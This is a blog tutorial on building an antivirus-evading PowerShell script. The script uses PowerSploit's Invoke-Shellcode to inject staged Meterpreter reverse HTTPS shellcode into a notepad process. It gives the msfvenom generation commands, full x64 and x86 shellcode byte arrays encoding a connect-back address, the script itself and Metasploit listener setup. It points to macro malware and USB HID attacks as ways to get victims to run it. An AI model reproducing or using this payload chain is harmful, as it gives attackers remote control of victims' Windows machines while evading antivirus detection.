July 19, 2018

Using PowerSploit to inject MSFVenom shellcode

(Last Updated On: 21st September 2016)

This article will discuss how we can use the rather brilliant PowerSploit project, coupled with MSFVenom, to inject a staged Meterpreter reverse HTTPS shell into a running process.  This script can then be Base64 encoded and used in a USB HID attack or a macro malware document and I will write the relevant guides for that too.

As an extra incentive to stick with this article, here is a screen of the finished completely self-contained PowerShell script uploaded to nodistribute.com.  As you can see, not a single AV engine detected even though if you ran it you would be handing control of your windows device to the attacker.

nodistributeresults

And to prove the code and concept, a quick screen from Metasploit showing payload execution.

pwnd

So, now you’ve seen the proof let’s get started.

Step 1 – Download Invoke-Shellcode and convert it to Base64.

We are going to use Base64 encoding as it allows us to turn the script into a long string we can drop into a PowerShell variable really easily.  We are going to include this PowerSploit script within ours as it means we are self contained rather than relying on fetching it off github at the time of execution.  So download it from here and use my text file to Base64 script to convert it into a long Base64 string.  Before you do that, it’s a good opportunity to go through and remove any bloat like comments and the default shellcode in there.

Step 2 – Generate some shellcode

This article is not here to cover the use of MSFVenom but we will cover how to do something very specific.  I’ll also assume you know how to install and load Kali linux in some form or another (I use VMware player).  The command to generate our reverse Meterpreter shell is this.  Switch [Your IP] for the IP of your Kali box (either the local IP if your intended target is on the same LAN or an internet accessible IP if they are on the internet somewhere).  The first line will generate x86 code, the second will generate x64.

msfvenom -p windows/meterpreter/reverse_https -f ps1 LHOST=[Your IP] LPORT=[443]
msfvenom -p windows/x64/meterpreter/reverse_https -f ps1 LHOST=[Your IP] LPORT=[443]

Copy this shellcode ready for use.

Step 3 – Populate this script

Okay so here is our PowerShell script which will put these two things together.  You need to put your Base64 string between the quotes where it says $invokeShellCodeBase64 = “…” (its going to be looooooong) and then insert your x86 and x64 shellcode where the comments tell you to.  The script will open a notepad executable and use it to judge whether to load the x86 or x64 shellcode.

Here is the script:

$invokeShellCodeBase64 = "..."
$invokeShellCodeString = [System.Text.Encoding]::UTF8.GetString(([System.Convert]::FromBase64String($invokeShellCodeBase64) | ? {$_} ))
iex($invokeShellCodeString)

& notepad.exe
$notepadPID = Get-Process -Name "notepad" | select -Last 1

if ($notepadPID.StartInfo.EnvironmentVariables["PROCESSOR_ARCHITECTURE"] -eq 'AMD64')
{
##### Insert x64 shellcode here (msfvenom -p windows/x64/meterpreter/reverse_https -f ps1 LPORT=443)
[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0
$buf += 0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2
$buf += 0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48
$buf += 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7
$buf += 0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c
$buf += 0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41
$buf += 0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52
$buf += 0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78
$buf += 0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b
$buf += 0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67
$buf += 0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40
$buf += 0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41
$buf += 0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48
$buf += 0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1
$buf += 0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45
$buf += 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49
$buf += 0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40
$buf += 0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1
$buf += 0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58
$buf += 0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52
$buf += 0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9
$buf += 0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49
$buf += 0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41
$buf += 0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26
$buf += 0x7,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a
$buf += 0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba
$buf += 0x3a,0x56,0x79,0xa7,0x0,0x0,0x0,0x0,0xff,0xd5
$buf += 0xe8,0x10,0x0,0x0,0x0,0x31,0x39,0x32,0x2e,0x31
$buf += 0x36,0x38,0x2e,0x32,0x30,0x39,0x2e,0x31,0x32,0x38
$buf += 0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x1
$buf += 0x0,0x0,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x3,0x53
$buf += 0x49,0xba,0x57,0x89,0x9f,0xc6,0x0,0x0,0x0,0x0
$buf += 0xff,0xd5,0xe8,0x82,0x0,0x0,0x0,0x2f,0x64,0x33
$buf += 0x67,0x58,0x57,0x4c,0x73,0x44,0x51,0x56,0x45,0x4a
$buf += 0x72,0x51,0x69,0x76,0x58,0x6b,0x5f,0x6a,0x50,0x41
$buf += 0x43,0x45,0x63,0x42,0x51,0x6c,0x69,0x35,0x74,0x78
$buf += 0x5f,0x41,0x7a,0x43,0x42,0x47,0x56,0x4d,0x35,0x6d
$buf += 0x58,0x4f,0x68,0x35,0x61,0x57,0x64,0x71,0x38,0x41
$buf += 0x32,0x69,0x58,0x5a,0x62,0x5a,0x73,0x63,0x72,0x61
$buf += 0x2d,0x34,0x6a,0x37,0x4f,0x70,0x5f,0x48,0x68,0x4f
$buf += 0x61,0x34,0x47,0x6e,0x77,0x70,0x33,0x65,0x42,0x66
$buf += 0x63,0x50,0x4f,0x64,0x43,0x6e,0x50,0x7a,0x46,0x47
$buf += 0x57,0x30,0x47,0x4e,0x6e,0x76,0x5a,0x63,0x6c,0x63
$buf += 0x64,0x43,0x56,0x65,0x66,0x70,0x6d,0x6d,0x33,0x6a
$buf += 0x6b,0x31,0x6c,0x77,0x65,0x62,0x49,0x59,0x76,0x70
$buf += 0x2d,0x45,0x70,0x68,0x57,0x74,0x0,0x48,0x89,0xc1
$buf += 0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8
$buf += 0x0,0x32,0xa0,0x84,0x0,0x0,0x0,0x0,0x50,0x53
$buf += 0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5
$buf += 0x48,0x89,0xc6,0x6a,0xa,0x5f,0x48,0x89,0xf1,0x6a
$buf += 0x1f,0x5a,0x52,0x68,0x80,0x33,0x0,0x0,0x49,0x89
$buf += 0xe0,0x6a,0x4,0x41,0x59,0x49,0xba,0x75,0x46,0x9e
$buf += 0x86,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x89,0xf1
$buf += 0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53
$buf += 0x49,0xc7,0xc2,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85
$buf += 0xc0,0x75,0xc,0x48,0xff,0xcf,0x74,0x2,0xeb,0xc0
$buf += 0xe8,0x56,0x0,0x0,0x0,0x53,0x59,0x6a,0x40,0x5a
$buf += 0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x0
$buf += 0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0
$buf += 0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48
$buf += 0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7
$buf += 0xc0,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x49,0xba
$buf += 0x12,0x96,0x89,0xe2,0x0,0x0,0x0,0x0,0xff,0xd5
$buf += 0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b
$buf += 0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd2,0x58,0x58
$buf += 0xc3,0x58,0x6a,0x0,0x59,0x49,0xc7,0xc2,0xf0,0xb5
$buf += 0xa2,0x56,0xff,0xd5
}
else
{
##### Insert x86 shellcode here (msfvenom -p windows/meterpreter/reverse_https -f ps1 LPORT=443)
[Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31
$buf += 0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52
$buf += 0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff
$buf += 0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd
$buf += 0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b
$buf += 0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1
$buf += 0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3
$buf += 0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac
$buf += 0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3
$buf += 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58
$buf += 0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c
$buf += 0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24
$buf += 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f
$buf += 0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65
$buf += 0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c
$buf += 0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53
$buf += 0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53
$buf += 0x53,0x6a,0x3,0x53,0x53,0x68,0xbb,0x1,0x0,0x0
$buf += 0xe8,0x24,0x1,0x0,0x0,0x2f,0x52,0x5f,0x69,0x4e
$buf += 0x57,0x61,0x6e,0x69,0x78,0x30,0x67,0x61,0x71,0x68
$buf += 0x75,0x72,0x54,0x55,0x6a,0x78,0x71,0x77,0x47,0x50
$buf += 0x45,0x30,0x56,0x34,0x36,0x4f,0x35,0x36,0x49,0x65
$buf += 0x43,0x31,0x58,0x62,0x45,0x51,0x78,0x34,0x44,0x4a
$buf += 0x59,0x2d,0x31,0x62,0x64,0x34,0x4b,0x41,0x4a,0x74
$buf += 0x4f,0x76,0x49,0x5f,0x43,0x38,0x4c,0x2d,0x77,0x38
$buf += 0x32,0x52,0x33,0x36,0x41,0x62,0x38,0x63,0x67,0x74
$buf += 0x31,0x68,0x6b,0x79,0x71,0x77,0x74,0x77,0x54,0x59
$buf += 0x59,0x53,0x4b,0x73,0x79,0x53,0x54,0x79,0x71,0x66
$buf += 0x6d,0x37,0x41,0x65,0x52,0x35,0x38,0x41,0x33,0x7a
$buf += 0x42,0x79,0x51,0x31,0x6d,0x6c,0x44,0x79,0x54,0x71
$buf += 0x6a,0x58,0x49,0x63,0x50,0x71,0x43,0x74,0x70,0x69
$buf += 0x61,0x54,0x73,0x72,0x6f,0x48,0x4d,0x71,0x51,0x49
$buf += 0x70,0x61,0x48,0x74,0x5f,0x42,0x33,0x41,0x56,0x66
$buf += 0x6e,0x6b,0x6d,0x6a,0x6d,0x49,0x39,0x4a,0x6d,0x59
$buf += 0x66,0x72,0x32,0x4b,0x4f,0x0,0x50,0x68,0x57,0x89
$buf += 0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x32
$buf += 0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb
$buf += 0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x68
$buf += 0x80,0x33,0x0,0x0,0x89,0xe0,0x6a,0x4,0x50,0x6a
$buf += 0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53
$buf += 0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff
$buf += 0xd5,0x85,0xc0,0x75,0x8,0x4f,0x75,0xd9,0xe8,0x4c
$buf += 0x0,0x0,0x0,0x6a,0x40,0x68,0x0,0x10,0x0,0x0
$buf += 0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53
$buf += 0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68
$buf += 0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89
$buf += 0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x7,0x1
$buf += 0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x77
$buf += 0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38
$buf += 0x2e,0x32,0x30,0x39,0x2e,0x31,0x32,0x38,0x0,0xbb
$buf += 0xf0,0xb5,0xa2,0x56,0x6a,0x0,0x53,0xff,0xd5
}

Invoke-Shellcode -Force -Shellcode $buf -ProcessID $($notepadPID.id)

Step 4 – Set up the Meterpreter listener

On you Kali box, we need to open a listener so we can receive the reverse shell from the target (who is executing that script).  We will do this the easy way and setup an instruction file for Metasploit and then launch Metasploit with it.

Either pick a listener for the target or use both, but as we are using the same LPORT you will to need to change it in your msfvenom command or use 2 listening devices (PC, laptop etc) with different IP addresses.

Here is the code for the x86 listener.

touch instructions.rc
echo use exploit/multi/handler >> instructions.rc
echo set PAYLOAD windows/meterpreter/reverse_https >> instructions.rc
echo set LHOST 0.0.0.0 >> instructions.rc
echo set LPORT 443 >> instructions.rc
echo set AutoRunScript post/windows/manage/migrate >> instructions.rc
echo set ExitOnSession false >> instructions.rc
echo exploit -j -z >> instructions.rc
msfconsole -r instructions.rc

Here is the code for the x64 listener.

touch instructions.rc
echo use exploit/multi/handler >> instructions.rc
echo set PAYLOAD windows/x64/meterpreter/reverse_https >> instructions.rc
echo set LHOST 0.0.0.0 >> instructions.rc
echo set LPORT 443 >> instructions.rc
echo set AutoRunScript post/windows/manage/migrate >> instructions.rc
echo set ExitOnSession false >> instructions.rc
echo exploit -j -z >> instructions.rc
msfconsole -r instructions.rc

Step 5 – Get the target to run your PowerShell script

I will write some guides on this soon.  For now try my macro guide and USB HID Attack guide.

Previous «
Next »

Simon is a sysadmin for a global financial organisation and specialises in Windows, security and automation.

Leave a Reply

Subscribe to SYNACK via Email

%d bloggers like this: